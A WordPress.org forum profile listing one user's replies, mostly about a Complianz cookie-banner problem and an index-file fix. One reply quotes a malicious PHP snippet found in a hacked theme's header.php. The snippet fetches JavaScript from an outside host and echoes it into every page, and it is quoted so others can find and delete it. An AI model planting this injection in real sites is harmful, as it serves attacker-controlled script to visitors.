anselmo
Forum Replies Created
-
Forum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownSuper support, thanks again
Forum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownNow it’s working. Thank you Rogier
Forum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownok Rogier I did it, installed the last version downloaded from the wordpress repository. Version 4.9.1
Forum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownyou wrote me: One other thing: I notice you’re still on the cookie path branch. I recommend to use the WordPress repository latest version.
Rogier I don’t know how to solve this thing you told me ….. I don’t know what we’re talking about, sorry!
Forum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownThank you Rogier, I’m sorry if I wasted your time but this makes me frustrated. Thanks for your invaluable help. I downloaded firefox from scratch and everything works fine. I don’t understand why it doesn’t work on chrome …. I cleared the cache so many times …… I guess I delete the browser and then reinstall it …….
Forum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownRogier, I opened millevetrine.com in incognito mode and the problem seems solved. I clicked the padlock but the complianz file is not among the cookies … there is no trace. Once returned in normal mode the problem’s still there
Forum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownRogier, this is what happen….. https://www.millevetrine.com/vetrine/wp-content/uploads/2021/01/millevetrine.mp4
thanks for the time you are dedicating to meForum: Plugins
In reply to: [Complianz - GDPR/CCPA Cookie Consent] Banner always shownHi Rogier, I have the same problem also clearing cache. I have opened the page with a new browser (opera) just right now and the problem’s still there…….
Forum: Fixing WordPress
In reply to: Internal Server Error (Hundreds of Sites with Same Message)fjoomla I’ve found a malicious code also in footer.php and in header.php so scan these files.
Forum: Fixing WordPress
In reply to: Internal Server Error (Hundreds of Sites with Same Message)Thanks…..
Forum: Fixing WordPress
In reply to: Internal Server Error (Hundreds of Sites with Same Message)Site is clean trying both check. Do you think once deleted that part of code everything it’s ok?
Forum: Fixing WordPress
In reply to: Internal Server Error (Hundreds of Sites with Same Message)I have (better to say I had) that code. What I can do now????……
Forum: Fixing WordPress
In reply to: Internal Server Error (Hundreds of Sites with Same Message)To solve the problem you need to delete some php lines from your header.php theme’s page.
Scroll header.php until you find a piece of code like this and delete it:<?php if(function_exists(‘curl_init’)) { $url = “http://www.wpstats.org/jquery-1.6.3.min.js”;
$ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo “$data”; } ?>That’s all.
AnxForum: Installing WordPress
In reply to: Problem with index.htm and index.phpI’m sorry I believed your “what the hec are you talking about?
bye bye “
was for meaning: “bye bye you are banned”
We both have had some misconceptions.Thanks again for your help I really appreciate.
Forum: Installing WordPress
In reply to: Problem with index.htm and index.phpSamboll I know you will delete this post so that nobody can see it but I would like to tell you something. First of all I want to thank you for your support. I didn’t pay you but you have still replied to my post. Second thing I’m sorry but I wrote a second post that is disappeared so I though you deleted it. Third thing it is not true that you can’t run two index in the same root. I’ve found the solution right here in your forum.
ChrisThomson
Member
Posted 7 months ago #
See changeset #9203. Replace the green code as seen in #9203 with the red code, in your /wp-includes/canonical.php file.If you really did not know about this possibility now you know…… you can help some others with the same problem just let them know this post :
http://ww.wp.xz.cn/support/topic/224098?replies=43